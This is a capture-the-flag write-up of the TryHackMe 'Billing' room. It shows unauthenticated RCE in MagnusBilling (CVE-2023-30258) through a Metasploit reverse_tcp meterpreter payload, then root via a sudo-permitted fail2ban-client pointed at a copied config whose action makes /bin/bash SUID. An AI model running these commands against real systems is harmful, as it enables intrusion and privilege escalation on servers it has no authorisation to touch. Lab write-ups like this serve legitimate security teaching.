Billing

Some mistakes can be costly. - by RunasRs

BillingTryHackMe

The following post by 0xb0b is licensed under CC BY 4.0

---

Recon

We start with a Nmap scan and find four open ports. Among them, we have a web server on port 80, a MariaDB service on port 3306 and an Astersik Call Manager on 5038.

From the default script scan, we can also see the content of robots.txt, which has a disallowed entry for the /mbilling directory.

| http-robots.txt: 1 disallowed entry 
|_/mbilling/

We visit the directory and have a login page in front of us. Furthermore, we can see the name MagnusBilling in the title.

http://billing.thm/mbilling/ 

After a short search, we see that it seems like an open-source VoIP billing and management system for managing SIP trunks, VoIP calls, and customer billing. It provides tools for call routing, monitoring, and invoicing.

Shell As asterisk

This has an unauthenticated remote command execution vulnerability CVE-2023-30258, which is available as a manual exploit but is also present in the Metasploit framework.

Rapid7Rapid7

We set up the exploit in the Metasploit framework and give it a try.

└─$ msfconsole 
Metasploit tip: Use the analyze command to suggest runnable modules for 
hosts
                                                  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%                                                                 
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%                                                                 
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%                                                                 
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%                                                                 
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %                                                                 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%                                                                 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%                                                                 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                                                 
                                                                                                                                              

       =[ metasploit v6.4.0-dev                           ]
+ -- --=[ 2405 exploits - 1239 auxiliary - 422 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > search magnus

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258  2023-06-26       excellent  Yes    MagnusBilling application unauthenticated Remote Command Execution.
   1    \_ target: PHP                                            .                .          .      .
   2    \_ target: Unix Command                                   .                .          .      .
   3    \_ target: Linux Dropper                                  .                .          .      .


Interact with a module by name or index. For example info 3, use 3 or use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
After interacting with a module you can manually set a TARGET with set TARGET 'Linux Dropper'

msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > show options

Module options (exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
                                         tml
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /mbilling        yes       The MagnusBilling endpoint URL
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0
                                       .0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


   When TARGET is 0:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generated if left unset.


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set LHOST 10.14.90.235
LHOST => 10.14.90.235
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set RHOST billing.thm
RHOST => billing.thm
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run

We get a shell and are the user asterisk.

We set up another listener, and set up another reverse shell. Due to the fact that I am not so familiar with the Metasploit framework and would like to have an upgraded shell.

To upgrade the shell, we follow the instructions provided here:

Upgrade Simple Shells to Fully Interactive TTYs0xffsec.com

We find another user, magnus in /etc/passwd. We have access to the home directory of the user and can read the user flag here.

Shell As root

As asterisk, we have the permission to execute sudo -l without password, and we are allowed to execute /usr/bin/fail2ban-client with root permissions.

Fail2ban is a security tool that monitors log files for suspicious activity and blocks IP addresses after repeated failed login attempts. It helps protect servers from brute-force attacks by automatically adding firewall rules.

The following resource provides various insights into how this could be used to extend your privileges.

Fail2Ban – Linux Privilege Escalation - Juggernaut-SecJuggernaut Pentesting Blog - A blog to help others achieve their goals in Cyber Security.

There you can find an approach to customize a config in the config directory and place code in it that is to be executed with root permissions. Unfortunately, we only have read-only access to the directory...

/etc/fail2ban

... and its contents.

But we can remedy this. We can copy the configuration directory and refer to it when executing fail2ban.

In the fail2ban-client command, the -c option specifies the configuration directory for Fail2Ban.

sudo fail2ban-client -c /tmp/fail2ban/ -v restart

With rsync -av /etc/fail2ban/ /tmp/fail2ban/ we recursively copy the contents of /etc/fail2ban/ to /tmp/fail2ban/.

rsync -av /etc/fail2ban/ /tmp/fail2ban/

We can then follow the Exploiting Fail2Ban and Getting a Root Shell section from https://juggernaut-sec.com/fail2ban-lpe/ and customize action.d/iptables-multiport.conf and restart the service or write our own config.

With the following, we write our own config, which executes a script, which in turn copies /bin/bash to /tmp/bash and makes it a SUID binary to get a root shell.

rsync -av /etc/fail2ban/ /tmp/fail2ban/

cat > /tmp/script <<EOF
#!/bin/sh
cp /bin/bash /tmp/bash
chmod 755 /tmp/bash
chmod u+s /tmp/bash
EOF
chmod +x /tmp/script


cat > /tmp/fail2ban/action.d/custom-start-command.conf <<EOF
[Definition]
actionstart = /tmp/script
EOF

cat >> /tmp/fail2ban/jail.local <<EOF
[my-custom-jail]
enabled = true
action = custom-start-command
EOF

cat > /tmp/fail2ban/filter.d/my-custom-jail.conf <<EOF
[Definition]
EOF

sudo fail2ban-client -c /tmp/fail2ban/ -v restart

After running the script we have a SUID binary at /tmp/bash and can execute it with the -p parameter to get a root shell. We then find the root flag at /root/root.txt.